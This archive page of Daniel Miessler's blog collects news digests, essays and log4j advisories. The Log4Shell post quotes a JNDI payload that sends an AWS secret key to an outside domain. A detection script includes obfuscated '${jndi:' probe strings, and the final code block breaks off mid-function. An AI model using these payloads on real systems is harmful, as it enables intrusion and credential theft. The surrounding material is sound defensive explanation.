Daniel Miessler's Blog, page 41
January 10, 2022
News & Analysis | No. 313
A North Korean cyberespionage group called Konni has been linked to attacks on the Russian Federation’s Ministry of Foreign Affairs. These attacks started with credential stuffing and then moved on to deploying malware to steal intelligence. More
Venture funding in the cybersecurity space crossed $20 billion in 2021, and the last quarter set a new quarterly record of $7.8 billion. More
Part of the Pegasus spyware package has been uploaded by a security researcher to Github. More
QNAP has warned its users to get its NAS devices off the internet, and it’s given instructions on how to do so. This comes after months of repeated vulnerabilities affecting the devices. More
OpenSSH 8.9 will include ssh-agent restriction. The agent has two main functions: “a safe runtime store for unwrapped private keys, removing the need to enter a passphrase for each use, and a way to forward access to private keys to remote hosts, without exposing the private keys themselves.” The new restriction lets you limit which remote hosts a forwarded key may be used on, and through which hosts, instead of trusting every host in the forwarding chain. More
The US military is working hard to counter the threat posed by hobbyist-level drones. The problem is that they’re both small and cheap, and you can strap explosives to them. Possible solutions range from lasers to microwave blasts. More
Vulnerabilities: VMware has patched a bug affecting ESXi, Workstation, and Fusion | System Takeover More
WordPress has been updated to address multiple vulnerabilities | DoS More
Incidents: The New York State Office of the Attorney General has warned 17 companies that 1.1 million customers have had their accounts compromised using credential stuffing. More
Companies: Google has purchased Siemplify—a late-stage Israeli company in the SOAR space—for around $500 million. More
TECHNOLOGY NEWS
Apple has become the first company to hit $3 trillion in market cap. It was also the first to hit $2 trillion, and if it has any success with a rumored headset and car, it’ll probably be the first to $4 trillion. I attribute a lot of this to Tim Cook and his expertise in managing a supply chain. More
GameStop is getting into NFTs. More
Blackberry devices stopped working on January 4th. For real this time. More
OpenSea, the largest NFT trading website, is now valued at $13 billion. More
Twitter is rolling out a new test feature where people do video reactions to tweets, like TikTok. More
It’s been 15 years since Steve Jobs revealed the iPhone. I remember where I was that day, and what I was doing. It was a big day for me, and it led to me becoming an Apple person when I was not at all before. More
HUMAN NEWS
A record 4.5 million Americans quit their jobs in November. The number of open positions fell from 11.1 million in October to 10.6 million in November. More
Between 2009 and 2018, the proportion of adolescents reporting having no sexual activity (including masturbation) rose from 29% to 44% among men, and from 50% to 74% for women. More
The Mayo Clinic fired 700 employees, around 1% of its workforce, for not complying with its vaccination policy. More
A nasal spray that prevents dementia is moving into human trials. It combines an antibiotic and resveratrol to combat plaques in the brain that are known to be associated with cognitive decline. More
1 out of every 153 American workers works for Amazon. More
CONTENT, IDEAS & ANALYSIS
The Unsupervised Learning Everyday Carry — Many have asked what my EDC is, i.e., what tools and gadgets I keep on my person and use every day. This member-only post answers that question and goes into why I use each item. More
Mentor vs. Nemesis — I enjoyed this piece on how many great people weren’t encouraged by mentors as much as they were energized by a nemesis. I see this dynamic a lot in life, where there is a healthy tension and competition between friends and peers in a particular space. The bug bounty space is a great example, where you have a lot of very smart hackers and creators putting out content. They’re friends, but they’re also competing. And some of them have one or more nemeses that drive them to be better. I’m not sure of the right balance of positive and negative—of push and pull—but I do think that it’s natural to be driven by negative competition. I personally use a different tactic, which is competing with the best in the world, including people who are dead, and demanding that I get to that level.
I vs. T-shaped People: Which Are Better For Which Jobs? — This was an interesting piece and discussion on Hacker News about someone who typically looks for I-shaped people (narrow and deep) vs. T-shaped people (broad and shallow), but who also happened to notice that most of their best projects had a good mix of both. I tend to look for people who are unicorns in this way: being mostly T, but with one or two I-like areas.
NOTES
Not sure who’ll notice, but I simplified the newsletter design for this episode, especially around the header. If you noticed and cared, let me know what you think.
We had a great UL Book Club today discussing Good Strategy, Bad Strategy. The next book has been chosen and we even have the next couple picked out after that. Great discussion today, and can’t wait for the next one!
I continue to struggle with blatant plagiarism of my content online and am looking for a solution to it. If you all know of anything, please let me know. More

SPONSORED DISCOVERY
PlexTrac: The Purple Teaming Platform
PlexTrac is the premier cybersecurity reporting and workflow management platform. With PlexTrac, security service providers and teams of all sizes can cut report writing time in half, streamline workflows, improve collaboration and communication, and gain a real-time view of their security posture.
Head over to PlexTrac.com/UnsupervisedLearning to download our Writing a Killer Pentest Report white paper to learn how PlexTrac helps cybersecurity practitioners produce quality work faster so they can focus on winning the right battles.
DISCOVERY
I just bought a couple of these masks, which came highly recommended by Clive Thompson. We’ll see how they do; I’ll report back. More
My Personal Notetaking Journey More
The Rise of Performative Work — “It’s not what you do. It’s how ostentatiously you do it.” More
Ethereum’s Reference on Smart Contract Security More
AI is Eating The World’s Workforce With Job Automation More
6 Ways to Delete Yourself From the Internet More
GovInfo RSS Feeds — A massive list of RSS feeds that let you track what the government is doing, from bills to budgets to congressional committee meetings, and more. More
The Wall — Near-real-time animations of geostationary satellites. More
Keyboard Drill — An elegant website that helps you learn to type faster. You give it a target WPM, and it drills you until you get that fast on various words. More
ffuf — My favorite web fuzzer, which is written in Go. More
nuclei — The future of vulnerability scanning (in my opinion). It’s YAML-based signatures for finding issues across multiple protocols. More
nuclei templates — A repository of check types that can be used with Nuclei. More
A TomNomNom Recon Tools Primer — A previous post of mine going over my favorite recon tools from @TomNomNom. More
RECOMMENDATION
Spend this time in January to lock in a solid daily routine. As James Clear says in Atomic Habits, we don’t rise to the level of our goals; we fall to the level of our systems. That means you need a good system. This is mine, which I spent about a week researching and writing during the holiday break. But it doesn’t matter so much which one you use. It matters more that you actually have one, and that you use it rather than relying on luck or hope. Find an algorithm that will get you to where you want to be, and follow it.
APHORISM
“The three most harmful addictions are heroin, carbohydrates, and a monthly salary.”
— Nassim Taleb
January 9, 2022
The Unsupervised Learning EDC Setup
January 2, 2022
News & Analysis | No. 312
December 29, 2021
Losers Exist, Don’t Hire Them
This is an internet re-post of a piece by Bryan Goldberg that is no longer available online.
–
by Bryan Goldberg
About a year ago, my sales operations team needed to hire an Account Manager. We had a handful of candidates in the interview pipeline, but one of them had far more relevant experiences than the others. So we interviewed him first, in hopes that it might save us a bunch of time.
He passed the first wave of the gauntlet, earning positive marks from a Director in our group, and he was also well-reviewed by the peers who he would be working alongside. “He’s been doing this for five or six years, and he can definitely achieve what we need from him,” was the consensus.
But then it was time for him to interview with me. I didn’t ask him very many questions about sales, advertising operations, invoicing, collections, or any of the handful of other tactical skills we wanted. I just grilled him on the bottom fourth of his resume — you know, the one about hobbies and college.
And when I asked him about his BA in English, which he had earned about five years earlier, he got nervous. “What was your favorite century of English literature,” I asked. But he hadn’t really focused on any particular era. Nor did he have an opinion.
“Did you have a particular affinity for poetry, drama, old novels?” He punted on that one too.
“Well, what was your favorite book? Or your favorite author?” He stared at me somewhat blankly.
“Oh, well, there were a bunch. None that really jump out at me right now. It was kind of a long time ago, you know? My memory is a bit hazy,” he said with a chuckle, before talking about how fun college was. I laughed politely, wrapped up the interview in 15 minutes, and informed the team that we would not be hiring this candidate.
Many fine professors and senior executives have written books about team-building and how to be a great manager. At some point, I will write about this meaty topic for PandoDaily. But here’s an amuse bouche until then:
Don’t hire losers.
They might be able to do the job for which they are hired. But that is not good enough. Especially at a startup where you are able to hire a lot fewer people than you would like.
As it turned out, we eventually did find someone for that position, with a lot less relevant experience. But she learned the job in about six weeks, and her upside enabled her to take on a lot of the unforeseen — and valuable — tasks that the previous candidate would have stumbled around.
And the good news is that it’s really easy to detect losers. Here are some things you can ask a potential candidate to find out:
“Tell me about what you studied in college, and what were some of your favorite classes?” A person who spent $120,000 and dedicated four years of their lives to any pursuit better be able to speak eloquently for five minutes on that humongous experience. Or else they are a loser.
“Tell me about your hobbies…” A person who has no hobbies, and can’t even exaggerate one, almost certainly lacks the ambition to make your company valuable. They are probably a loser.
“So, what do you think about our website?” If the applicant hasn’t performed even the most basic due diligence in preparation for the interview, then they have no common sense. And if they are too weak to offer an opinion on a matter, that is a huge negative. There’s a Smash Mouth song about people like that.
“Which of your previous jobs did you enjoy the most?” Applicants screw up this question so often, you’d think that you were quizzing them on Fermat’s Last Theorem. How can you know if they are a fit for your work environment, when they can’t even tell you about a work environment that appeals to them? There’s a Beck song about people like that.
These sorts of questions are great, because they can help identify winners even amongst the nervous, “I don’t interview well” types of people who may warm up and shine on the job. And I’ve hired a lot of great people who don’t interview especially well. But when I jump into the above questions, they are able to speak eloquently to how dynamic and thoughtful they are as people.
Lesser managers will try to stump candidates with horrible brain teasers along the lines of “Describe a time you got into a bad situation and resolved it effectively?” — or crap like that. Those questions are not necessary. All you will do is filter out some good people who have not yet mastered the art of the interview.
But if a candidate can’t even tell you why they liked their last job, or what they got out of their college experience, or any of the million other questions that speak to their basic humanness… Then no amount of experience will make them valuable.
They are losers. They are out there. And you should not hire them.
–
Notes
If Bryan Goldberg ever brings this post back online at a new site, I will remove this version.
Image by Hallie Bateman.

December 28, 2021
My Predictions for Crypto
First off, nobody has any idea what’s going to happen. Let’s be clear about that. These are musings—nothing more.
I see the current crypto hype as three distinct phenomena—with descending levels of longevity.
- The ideas
- The tech
- The hype

The ideas
I think the ideas are most likely to survive for decades, which are:
- A digital replacement for reality where the other 80% can find meaning away from meatspace (metaverse)
- A shared, decentralized computer (Ethereum/et al)
- Removing the middleman (de-$FOO)
- Decentralized finance (defi)
- Smart contracts
- Digital validation of ownership (NFTs)
- Decentralized and autonomous organizations (DAOs)

The tech
The next most fragile in this list is the technology itself. So, blockchains. Bitcoin. Ethereum. NFTs built on top of current blockchains. Etc.
There’s no way to know if the current iteration is stable, or if it’ll completely fail in a few months/years, cause a new Dark Ages for these ideas, and be resurrected in 5-20 years when the tech or society is ready.
Many of the ideas above can be implemented using existing, non-crypto technologies, so there’s no reason to assume that crypto is an inevitability.
The hype
The most fragile of all these is the hype, which is not sustainable. The number of companies being formed right now that are raising billions of dollars in “value”—all based on mania and FOMO—is completely insane.
There’s no way the top of this doesn’t blow or slide off within 1-3 years. Even if this first iteration IS THE ONE, we’d still see consolidation at the top that removes 60-95% of the players from the board.
The predictions
There are obviously more than two options.
OPTION 1 — We get it right the first time with Bitcoin/Ethereum, and society is reshaped in the image of decentralization, smart contracts, and digital ownership. Many lucky entrepreneurs become owners of billion and trillion-dollar companies in the course of the next 10 years. Massive consolidation happens, and something like 2-5% of the coins/chains survive.
OPTION 2 — The whole thing fizzles out in the next several months to a couple of years. Either regulation, performance issues, or vulnerabilities basically kill off Bitcoin and Ethereum, and they take down the entire ecosystem with them. It’ll be like the AI Winter of the 1970s, except for crypto. But the ideas above survive, and they start getting implemented in 5-10 years using traditional, non-crypto-based technologies. Somewhere around 10 years later another hype cycle may start around crypto, depending on how successful the implementation of the ideas was using non-crypto tech.
I’m personally betting on #1, but I’d not be surprised at all if #2 happened.
The only thing I’m highly convinced of is that the Ideas will not die. I believe they’ll keep re-emerging as themes regardless of whether they’re implemented using crypto or traditional technology.
A Correction is Coming, and That’s Ok
People have been talking about a stock market correction (or crash) for years now, and for good reason. We’ve seen massive growth for years, and that’s usually followed by a drop (see above).
But I’m tracking another narrative that’s pretty damn compelling—namely the narrative of “So what?” If you draw a line through that graph—including all the crashes—it’s absolutely heading upwards.
Simple doesn’t always mean right.
So my read on this is pretty simple: Yes, we might have a correction soon, in fact we should expect one. But that doesn’t mean you shouldn’t be in stocks.
The only question is how long you plan to be in the game.
If you are trying some sort of scheme to get rich quickly, with this stock or that stock, yes—you might get burned by a correction. But if you’re buying solid stocks, or index funds, and you plan on holding them for 10, 20, or 30 years, I think the data shows you’re pretty safe.
We’ve seen lots of market crashes, but not a single one that wasn’t followed by stocks hitting new highs.
Now keep in mind—this doesn’t account for a total collapse of the economy, or the downfall of the United States, or the end of civilization. There are no guarantees that past trends will continue.
My only point here is to not be overly concerned about the trend of corrections, because that trend sits within the trend of recoveries that take stocks even higher.
Summary
- People think we’re likely to see a correction in stocks soon.
- The data show that this is likely, although nobody knows when it will be.
- Some think this is a reason to avoid stocks.
- I and others think a correction is not only likely, but virtually guaranteed, and that this is only scary if you are working some sort of short-term scheme.
- If you are investing in the stock market long-term, using strong stocks and/or index funds, you will likely survive this coming dip to see the other side.

What to Do Instead of New Years Resolutions
I’ve been anti-new-years-resolutions for a while now.
My reason is simple: I don’t like gimmicks. And that’s what most resolutions are. They’re nice stories that people tell themselves about how they’ll be better next year.
Here’s the simple truth about these types of resolutions: If you had the ability to eat less, or exercise more, you wouldn’t wait until the end of December to make those changes. Anyone capable of such discipline would make the change immediately—not at the end of the year.
But it’s not all bad news for next-year planning. I think there are a few tasks that fit well with an annual cadence, and you might as well get them done between December 15th and January 1st when you have some downtime to reflect.
My annual life optimizations
You don’t rise to the level of your goals; you fall to the level of your systems.
James Clear
This isn’t the same as buying a gym membership; it’s a commitment to a schedule.
- Optimize your daily routine and commit to staying with it. I just redid mine and published it here.
- Make sure your life is backed up, and that you have functioning auto-backups in place.
- Get to a zero inbox. I use Superhuman, so that includes all Starred email too.
- Make a list of the people you should be interacting with regularly in the coming year. This means taking people off the list and adding others. The criteria will be different for everyone, but I recommend something like the following. It’s harsh, but in order to be great you need to limit the type of energy you’re absorbing from the people in your life.
  - Drop people who are negative or toxic, and who are unwilling to put in the work to improve themselves.
  - Add a few people who work harder than you and/or have some measure of success that you wish to achieve.
  - Add a few people who are up-and-coming grinders who could benefit from your position and knowledge.
So, cut the negative people, find some people who push you, and find some people to help on their journeys.
This is my longer list.
- Review your evergreen books. Bring up your most important books, or at least your favorite passages from them, and re-absorb them. My short(er) list of favorites includes:
  - Atomic Habits
  - Meditations
  - Never Split the Difference
  - A Guide to the Good Life
  - The Evolution of Everything
I don’t generally have time to re-read all of my favorites, but I use Kindle Highlights (and now Readwise) to review my favorite snippets. If you don’t have your books marked up in this way, take this opportunity to do that.
Summary
- Resolutions are fantasies.
- Use the time to perform annual tune-ups on your systems instead.
- Update your daily routine with what you’ve learned in the last year.
- Make sure your most important text, documents, and images are backed up properly, with automation.
- Manicure the list of who you’re going to associate with this coming year.
- Re-consume and re-process your favorite wisdom from your favorite books.
I hope you have a wonderful 2022.

Notes
Make sure your routine includes regular pings to people you care about, telling them that they’re awesome and that you care about them.

December 22, 2021
Comparing My Top Four Security Podcasts/Newsletters
I get asked a lot what my go-tos are for security content. My top four recommendations are Darknet Diaries, Risky Business, Unsupervised Learning (yes, my own show), and TL;DRSec.
As for including my own show, I’m too old and well-read for false humility or arrogance.
What’s so interesting about these four is how different they are. I did this analysis so I could capture what I cared about and how each of them provides those items in different amounts—which allows me to make better recommendations to people.
Here’s my analysis and summary.
Show identity
Darknet Diaries is, first and foremost, a storytelling podcast. It is, without question, the best produced and executed podcast in security, and arguably anywhere. It has the quality level of a professional podcast series put out by NPR or the New York Times. But it isn’t just production quality—it’s the quality combined with the content. Jack dives deep into fascinating stories and topics like a combination of Columbo and Malcolm Gladwell, pulling threads and peeling layers and describing the process as he goes. This podcast should have a warning label for anyone doing any other profession when they start listening, because a few episodes of this show might make them want to start a career in security.

Risky Business is a security and hacking news show, with a secondary note of vendor exposure and education. Patrick applies his journalism background to cover security stories in an entertaining way, especially when he’s accompanied by his regular partner, Adam Boileau, who is a professional penetration tester. Patrick is from Australia and Adam is from New Zealand, so they’re both cheeky, which keeps their rendition of security news not just informative but also entertaining. They also have regular interviews with interesting people, and have sponsor slots that expose the audience to new security companies and their tools. Risky Business is—at least in my circles—the most known and most popular security news podcast.

Unsupervised Learning is a show that explores the patterns in security, tech, and society. My primary emphasis for this show is efficiency, i.e., giving people as much quality information and ideas as possible in the shortest amount of time. The broader scope of the show is polarizing because it’s not a pure security show, or a pure tech show, or a pure show about society. Patrick from Risky Business once told me it was a “thinking podcast”, which I’ll happily accept.
Think of it as a zoomed-out view of what’s happening in security, tech, and society—combined with analysis, original thinking, and a Discovery section that lists the best stuff I’ve found in my reading from the last week.

TL;DRSec is a newsletter centered around security research. Clint applies his academic background (he actually has a Ph.D. but never mentions it) to find and summarize the best security tools and presentations. Many newsletters have sections for tools, including my own, but Clint’s is the best because it’s his entire focus. Many of the tools he covers are centered around cloud security, but he often has sections for network security, mobile security, and many other areas. As I’ve said before, Clint’s is the one security newsletter that I will not skip a week on, and will not stop until I’ve read the entire thing. I open more links in his newsletter than for any other.

Analysis
So, since this is all about recommendations, let’s look at the attribute breakdown and see what we can learn.
One thing that jumped out at me was that Darknet Diaries had really low scores in a lot of areas I care about, but it was the only show with 10s. And it had two of them. I like this. It means it knows what it is and it leans heavily into that. Like I said, if you’re up for being entertained and educated about the world of hacking, there is simply nothing better.

Coming less from the scorecard, I’ve found there are generally two types of people when it comes to podcasts: people who need to be entertained to listen, and people who are simply searching for nuggets they can use elsewhere. I am in the second category, which is why I built a show around that. But if you’re looking for humor and entertainment, I’d say you should move towards Risky Business and avoid Unsupervised Learning. And if you’re looking for a super-efficient (but somewhat antiseptic) injection of content/ideas, I’d say go with UL. Note that TL;DRSec doesn’t have a podcast, so it’s not really rated on this count.

One thing that Risky Business has that Unsupervised Learning and TLDRSec don’t have is a strong sense of attacker activity. With Patrick’s curiosity and Adam’s pentesting focus, they aren’t just talking about what happened; they also focus on linking the activity to a given threat actor, and mentioning other attacks they’ve been associated with. If you like being up to speed on what the bad guys are doing, from a security news perspective, Risky Business definitely has that covered. Darknet Diaries does that as well, but at a much narrower scope and in much more depth.

Unsupervised Learning, over the course of a year, ends up being less like a security show and more like a thinking and analysis show from the perspective of a security professional. Like I said, that’s either good or bad, depending on what you’re looking for. The show attempts to give not just the stories and the details, but the context and patterns and impact that they have on our lives.
That’s the goal anyway.

TL;DRSec is highly focused on exposure to great research and does a really good job of highlighting the people behind that work. Clint is an extremely kind and positive person, and it shows in his newsletter. He is constantly lifting people up, exposing their work to people who might be interested, and making connections between people with similar interests. You can think of Clint as a security research maven who is the most aware person out there of what people are working on. Combine that with his own technical expertise and you have a brilliant guy and a wonderful newsletter.

Summary
- These are my top four recommendations for people to read or listen to within security.
- They are very different.
- Darknet Diaries you have to listen to regardless. End of story.
- Listen to/read Risky Business if you like Aussie/Kiwi snark combined with in-depth coverage of attacker groups.
- Listen to/read Unsupervised Learning if you want security news combined with context, ideas, and analysis of how it impacts us as humans.
- Read TLDRSec if you want the best exposure to the best security research, delivered in a positive and uplifting way.
I hope this helps you.
Notes
The original version of this piece had Adam as Australian. Apologies.

December 18, 2021
The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think
If you’re reading this you’re underslept and over-caffeinated due to log4j. Thank you for your service.
I have some good news.
I know a super-smart guy named d0nut who figured something out like 3 days ago that very few people know.
Once you have 2.15 applied, or the log4j2.formatMsgNoLookups mitigation in place, you actually need a non-default log4j2.properties (or log4j2.xml) configuration to still be vulnerable!
Read that again.
The bypasses of 2.15 and of the NoLookups mitigation (tracked as CVE-2021-45046) don’t affect people unless they have non-default logging configurations. From the Apache advisory:
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern.
Apache Project Security Advisory
“Certain non-default configurations”. I’ve never heard a sweeter set of syllables.
These can also be set in log4j2.xml or programmatically.
So you need to have changed your configs to include lookup patterns like:
$${ctx:loginId}
${ctx:...}
${event:...}
${env:...}
...etc. to be vulnerable to the bypass of the 2.15 patch, or of the log4j2.formatMsgNoLookups / LOG4J_FORMAT_MSG_NO_LOOKUPS=true mitigation!
That’s huge! And Nate figured this out like 4 days ago!
Just to point out to those panicking about this right now: this is a very uncommon situation to be vulnerable from this CVE in a “readily exploitable from the internet” way.
— d0nut (@d0nutptr) December 15, 2021
Look for ${event:Message} or ${ctx:*} in your log4j2 properties or xml files
He mentioned to me multiple times this wasn’t as bad as people thought, but he wasn’t shouting from the rooftops so I didn’t listen well enough. Shame on me.
He also happens to have a strong meme game.
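To make the “look for ${event:Message} or ${ctx:*} in your log4j2 properties or xml files” check concrete, here is a small scanner added for this post (it is not d0nut’s or Apache’s code). It reads log4j2 configuration text in properties or XML form and reports pattern-layout lookups that pull attacker-influenced data back through the lookup machinery, which is the “certain non-default configuration” the advisory describes. The sample configurations inside it are constructed for the example, and the list of prefixes it flags is an assumption about what is worth a second look, so treat a hit as “review this”, not as proof of exploitability.

```python
import re
from typing import List, Tuple

# Lookup prefixes worth flagging inside a layout pattern. ctx (Thread Context
# Map / MDC) and event are the ones the Apache advisory describes for the 2.15
# bypass; env/sys/jndi/map/main should not be in a pattern without a review
# either. This list is an assumption made for the example, not an official one.
RISKY_PREFIXES = frozenset({"ctx", "event", "env", "sys", "jndi", "map", "main"})

# A lookup in a layout is written ${prefix:key} or $${prefix:key}. The doubled
# dollar defers expansion to log-event time, which is exactly the dangerous
# form, because the expansion then runs against per-event (user-influenced) data.
LOOKUP_RE = re.compile(r"\$\$?\{\s*([A-Za-z]+)\s*:")


def find_risky_lookups(config_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, prefix, stripped_line) for every line of a log4j2
    properties or XML configuration that contains a lookup with a risky prefix.
    %X{key} (the MDC pattern converter) is NOT a lookup and is not flagged: it
    prints MDC data without feeding it back through the lookup resolver."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("#") or stripped.startswith("<!--"):
            continue  # properties comment or single-line XML comment
        for match in LOOKUP_RE.finditer(stripped):
            prefix = match.group(1).lower()
            if prefix in RISKY_PREFIXES:
                hits.append((lineno, prefix, stripped))
    return hits


# --- constructed sample configurations (not taken from any real deployment) ---

# Default-style layout: converters such as %d{...} and %X{loginId} only, no lookups.
SAFE_PROPERTIES = """\
status = warn
appender.console.type = Console
appender.console.name = STDOUT
appender.console.layout.type = PatternLayout
appender.console.layout.pattern = %d{HH:mm:ss.SSS} [%t] %-5level user=%X{loginId} %logger{36} - %msg%n
rootLogger.level = info
rootLogger.appenderRef.stdout.ref = STDOUT
"""

# Same file, but the pattern pulls the MDC value through a Context Lookup.
RISKY_PROPERTIES = SAFE_PROPERTIES.replace("user=%X{loginId}", "user=$${ctx:loginId}")

# XML form of a risky config: the layout re-expands the log message itself.
RISKY_XML = """\
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <!-- ${ctx:loginId} inside a comment is ignored by the scanner -->
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %c{1.} [%t] ${event:Message}%n"/>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="Console"/></Root>
  </Loggers>
</Configuration>
"""


def main() -> None:
    for name, text in (("safe.properties", SAFE_PROPERTIES),
                       ("risky.properties", RISKY_PROPERTIES),
                       ("risky.xml", RISKY_XML)):
        hits = find_risky_lookups(text)
        print(f"{name}: {'review' if hits else 'ok'}")
        for lineno, prefix, line in hits:
            print(f"  line {lineno}: {prefix} lookup -> {line}")


if __name__ == "__main__":
    main()
```

Point it at the real files by reading them into a string and passing the text to find_risky_lookups; anything it reports is a pattern layout that keeps the 2.15 bypass alive and should be changed to a %X{...}-style converter or removed.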
Summary
- The first vuln was just as bad as everyone thinks it is. Or worse. It did not require this non-default logging configuration.
- But if you are patched to 2.15, or mitigated with the NoLookups config, you are no longer vulnerable unless you ALSO have a logging configuration (log4j2.properties, log4j2.xml, or set programmatically) whose pattern layout uses a context lookup that sends attacker-controlled data back through the lookup machinery.
- So, if you’re already patched to 2.15 and/or have the mitigation in place, and don’t have non-standard configs—which you should confirm—you might be able to sleep for a bit.
- And of course—keep in mind that this all only pertains to vulnerabilities we know about today. And the internet moves fast.
- Finally, d0nut is awesome and you should follow his work.

Notes
This also applies to the DoS that 2.17 addresses.
Thanks to Nate for the great find!

POV: you follow me pic.twitter.com/Xw33fmji1A
— d0nut (@d0nutptr) December 15, 2021
December 13, 2021
News & Analysis | No. 311
The log4j (Log4Shell) Situation
What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs.
Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. Heartbleed affected anything running a vulnerable OpenSSL build (a large share of the internet’s TLS endpoints), while this one only affects systems that use log4j, but this issue produces direct and immediate harm in the form of password/key extraction and shells.
This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.
How it Works: The vulnerability is due to insecure “lookup” functionality within log4j that expands ${...} expressions found in logged strings, even when that string came from a user. So if you provide the input `${env:PWD}`, it’ll write the PWD environment variable to the log. The ${jndi:...} lookup is the dangerous one: it makes the application connect to a server named in the payload (LDAP, RMI, etc.) and load what comes back, which is remote code execution (RCE). It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.
Example: Here’s an example from @dildog of exfiltrating AWS keys. The inner ${env:...} lookup is expanded first, so the secret becomes part of the hostname that the victim then resolves and connects to, on infrastructure where the attacker is listening for the incoming request.
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}
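The payload above nests one lookup inside another, and that same nesting is what lets attackers dress up the ${jndi: prefix so that a plain string match (the kind a WAF rule or a grep over access logs does) misses it. The following detector is an added example for this post, not code from @dildog, Apache, or anyone else: it collapses the common case-changing and default-value obfuscations the way log4j’s own resolver would, and only then looks for the JNDI lookup. The access-log lines it scans are constructed (addresses and paths are made up; the last one reuses the exfiltration shape quoted above), and its obfuscation list is a starting point rather than a model of every lookup log4j supports.

```python
import re
from typing import List, Tuple

# Obfuscations used to get past naive "${jndi:" string matching:
#   ${lower:J} / ${upper:j}   -> a single letter, case-changed
#   ${::-j}, ${env:NOPE:-j}   -> the ":-default" form, which yields the default
#                                when the named lookup is empty or unset
# Each resolves to plain text, so a detector has to collapse them before
# looking for the JNDI prefix, exactly as log4j's resolver would.
OBFUSCATION_RE = re.compile(
    r"\$\{(lower|upper):([^{}]*)\}"   # case-changing lookups
    r"|\$\{[^{}]*?:-([^{}]*)\}",      # default-value form
    re.IGNORECASE,
)

# After normalization the payload has to spell out ${jndi: to reach JNDI at all.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _collapse(match: "re.Match") -> str:
    kind, value, default = match.group(1), match.group(2), match.group(3)
    if kind is None:
        return default
    return value.lower() if kind.lower() == "lower" else value.upper()


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse innermost obfuscating lookups until nothing changes.
    Innermost-first works because neither pattern may match across braces."""
    previous = None
    while previous != text:
        previous, text = text, OBFUSCATION_RE.sub(_collapse, text)
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI_RE.search(normalize_lookups(line)) is not None


def find_probes(log_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, normalized_line) for each line carrying a JNDI lookup."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if is_log4shell_probe(line):
            hits.append((lineno, normalize_lookups(line)))
    return hits


# Constructed access-log sample (documentation IP ranges, made-up paths).
# Line 5 carries a harmless non-JNDI lookup and must not be flagged.
SAMPLE_LOG = """\
198.51.100.20 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.21 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"
198.51.100.21 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:J}ndi:${lower:L}dap://203.0.113.7:1389/a}"
198.51.100.21 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${env:NOPE:-i}:rmi://203.0.113.7:1099/x}"
198.51.100.22 - - [10/Dec/2021:14:02:15 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 5 "-" "curl/7.79"
198.51.100.21 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}"
"""


if __name__ == "__main__":
    for lineno, normalized in find_probes(SAMPLE_LOG):
        print(f"line {lineno}: {normalized}")
```

Running it over the sample flags lines 2, 3, 4 and 6 and leaves the ${date:yyyy} request alone; the point is the normalization step, since without it only lines 2 and 6 would match a literal ${jndi: search.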
What to Do: The best way to fix this is to find all your instances of log4j and patch them to 2.15+. If you can’t do that, there are a few possible mitigations:
- Patching: Upgrade to version 2.15.0.
- Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
- For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
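For the version check and the JndiLookup removal, here is a small helper added for this post (it is not Apache tooling and not the zip one-liner itself, which it mirrors). It reads a log4j-core jar, reports the version from the Maven pom.properties that ships inside it, checks whether JndiLookup.class is present, and writes a copy with that class removed. The jar it examines is built in memory from constructed content so the example runs offline; mitigation_for encodes the thresholds given in this post for this CVE (2.15.0 as the patch, 2.10+ for the NoLookups flag), which later Apache releases superseded.

```python
import io
import zipfile
from typing import Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(version: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); qualifiers such as in '2.0-beta9' are dropped."""
    parts = [int(p) for p in version.split("-", 1)[0].split(".")]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def mitigation_for(version: str) -> str:
    """The post's advice keyed on the log4j-core version. Assumption made for
    this example: 'patched' means patched for this CVE only; later advisories
    raised the target release above 2.15.0."""
    v = parse_version(version)
    if v >= (2, 15, 0):
        return "patched"
    if v >= (2, 10, 0):
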